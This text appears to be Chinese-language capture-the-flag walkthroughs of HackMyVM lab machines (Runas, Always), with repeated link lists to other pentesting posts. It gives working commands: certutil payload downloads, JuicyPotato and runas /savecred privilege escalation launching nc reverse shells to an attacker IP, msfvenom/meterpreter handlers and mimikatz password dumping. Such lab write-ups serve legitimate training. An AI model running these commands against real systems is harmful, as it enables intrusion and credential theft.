http://192.168.53.51:8000/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.listhttps://github.com/ohpe/juicy-potato/blob/master/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.list然后用这个工具测试certutil.exe -urlcache -split -f http://192.168.53.51:8000/juicy-potato/Test/test_clsid.bat此时你的靶机上应该要有这三个文件此时验证一下，能否正常访问administrotar的文件，结果为拒绝访问（因为靶机限制了我不能使用whoami，所以只能这样验证）回到目录，执行此文件随便选择一个系统权限的clsid最终提权命令如下，kali记得开ncJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\xampp\htdocs\wordpress\wp-content\plugins\editor\editor\extensions\pagebuilder\includes\nc.exe 192.168.53.51 4444 -e cmd.exe" -t *此时就可以访问管理员的文件了往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-Runas ：简单 8.1 信息打点首先进行全端口扫描端口详细信息探测时使用guest账户即可获取信息，说明 SMB 可能允许匿名访问或 guest 权限过高。可以使用smbclient进行匿名登录试试，登录成功！但是没有任何东西ms17-010使用目录扫描、nothing8.2 文件包含利用来到首页点进来index.php发现需要我们传一个file参数，大概率就是文件包含了尝试包含index.php没有效果利用burp进行批量文件包含，字典网上随便找几个筛选内容可以看到这里有一段密文runas-b3a805b2594befb6c846d718d1224557yakuzza解密网站https://www.somd5.com/8.3 远程连接有了账号密码，登录口在哪？看了看之前的端口扫描结果是没有3389端口的，但是现在又有了。。。。。（中途换了换网，ip变成了10.10.10.168）可能是我疏忽了吧，快点来连，搞不好等一下又关了8.4 创建反向shellwindows下载马certutil.exe -urlcache -split -f http://10.10.10.137:8000/shell.exemsf注意监听，同时执行windows机器上的马msfconsole use multi/handler set lhost 10.10.10.137 set payload windows/meterpreter/reverse_tcp run8.5 MSF内核提权全部失败。。。8.6 WinPEAS提权在windows中下载下来，并执行，发现一个最新的漏洞补丁没有打certutil.exe -urlcache -split -f http://10.10.10.137:8000/winPEAS.bat ./winPEAS.bat使用searchsploit检索exp在windwos中的VS打开，打包成exe放上去执行的时候没有任何回显，失败了8.7 土豆提权后面又试过好几种方法，土豆提权，提权失败certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET4.exe GodPotato-NET2.exe -cmd "cmd /c whoami" GodPotato-NET35.exe -cmd "cmd /c whoami" GodPotato-NET4.exe -cmd "cmd /c whoami"8.8 JuicyPotato提权烂土豆提权certutil.exe -urlcache -split -f http://10.10.10.137:8000/JuicyPotato.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/CLSID/Windows_7_Enterprise/CLSID.list certutil.exe -urlcache -split -f http://10.10.10.137:8000/juicy-potato/Test/test_clsid.batJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\runas\nc.exe 10.10.10.137 4444 -e c:\windows\system32\cmd.exe" -t *执行成功了，但是不能执行命令，提权失败8.9 runas提权在网上找到了这个，使用runas提权https://www.cnblogs.com/kqdssheng/p/18751119在上面这个图片中，可以看到本地管理员账户的凭据已存储在凭据管理器中，并且当前用户是runas！当前的 runas 用户能列出 RUNAS-PC\Administrator 的缓存凭据，具备利用这些凭据实现本地提权的条件Domain:interactive=RUNAS-PC\Administrator 是 “交互式登录的管理员凭据缓存”，意味着系统之前保存过 Administrator 的登录信息（比如用户曾用 Administrator 登录，或通过 runas /savecred 保存过凭据）。虽然无法直接看到明文密码，但 Windows 允许 “在缓存凭据存在时，以该用户身份执行程序”—— 这是提权的关键：8.10 两种具体提权方法使用下面的命令启动一个cmdrunas /savecred /user:RUNAS-PC\Administrator "cmd.exe"此时你执行完这条命令目标机器就会弹出一个cmd窗口，此时你执行命令的时候就是administrator超级管理员，那么我们是不是能够通过上面这条命令执行一个木马，或者nc，来反弹这个shell到kali上？来试试，提权成功！certutil.exe -urlcache -split -f http://10.10.10.137:8000/nc.exe # 从kali中下载nc runas /savecred /user:Administrator "C:\Users\runas\nc.exe 10.10.10.169 4444 -e cmd.exe"8.11 msf内核扫描提升至系统权限可以使用winPACE.exe进行信息收集，在尝试过各种admin提权到系统权限的方式比如multi/recon/local_exploit_suggester MS17-017 exploit/windows/local/ms16_075_reflection 烂土豆提权 土豆提权 多土豆汁提权等等MS16-032最终测试出来windows/local/service_permissions 能够成功提权到system权限， Windows服务权限配置错误漏洞。8.13 抓取明文密码上传mimikatz，获取明文密码！！certutil.exe -urlcache -split -f http://10.10.10.169:8000/mimikatz.exe往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-Always ：简单 7.1 信息打点nmap -sS -p- -T4 10.10.10.161 -A使用目录扫描出来一个admin后台界面查看源码发现账号密码信息登录进来发现一个base编码解密ftpuser:KeepGoingBro!!!7.2 登录FTP使用刚刚的账号密码登录ftp 10.10.10.161发现了一个robots.txt，使用下面的命令将它下载下来get robots.txt查看这个robots.txt中的文件管理员的秘密笔记 1）禁用防火墙和 Windows Defender。 2）启用 FTP 和 SSH。 3）启动 Apache 服务器。 4）别忘了更改用户“always”的密码。当前密码是“WW91Q2FudEZpbmRNZS4hLiE=”。又得到一个密码always:YouCantFindMe.!.!7.3 远程登录发现密码不对，我们来使用hydra来爆破rdp协议使用enum4linux枚举，看到支持的smb协议，为1.0和2.0/2.1，3.0以上均不支持，让我联想到了永痕之蓝漏洞（MS17-010）enum4linux-ng -A 10.10.10.161 -C含义：-A 是 --all 的缩写，表示执行全量信息收集，包含以下枚举内容：主机基础信息（主机名、工作组 / 域、MAC 地址）；SMB 协议支持情况（支持的 SMB 版本、签名配置）；用户和组列表（本地用户、域用户、内置组等）；共享目录（可访问的 SMB 共享及权限）；操作系统版本（通过 RPC 或 SMB 信息推断）；服务、打印机、系统策略等其他信息。7.4 永痕之蓝利用，很遗憾利用失败利用nxc枚举这两个账号密码always:YouCantFindMe.!.! ftpuser:KeepGoingBro!!!看到ftpuser用户，尝试登录，也不让远程登录7.5 近源攻击这里没找到其他方法，直接登录靶机上传shell吧（近源攻击），这里还需要注意，就是需要修改一下语言为美国的，不然登录不进去7.6 Msf获取反向shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.137 LPORT=4444 -f exe -o shell.exe certutil -urlcache -split -f http://10.10.10.137:8000/shell.exe c:\1.exemsf上线msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 10.10.10.137 set lport 4444 run7.6 MSF内核漏扫use multi/recon/local_exploit_suggester使用第一个模块，设置第一个会话，并进行提权##往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透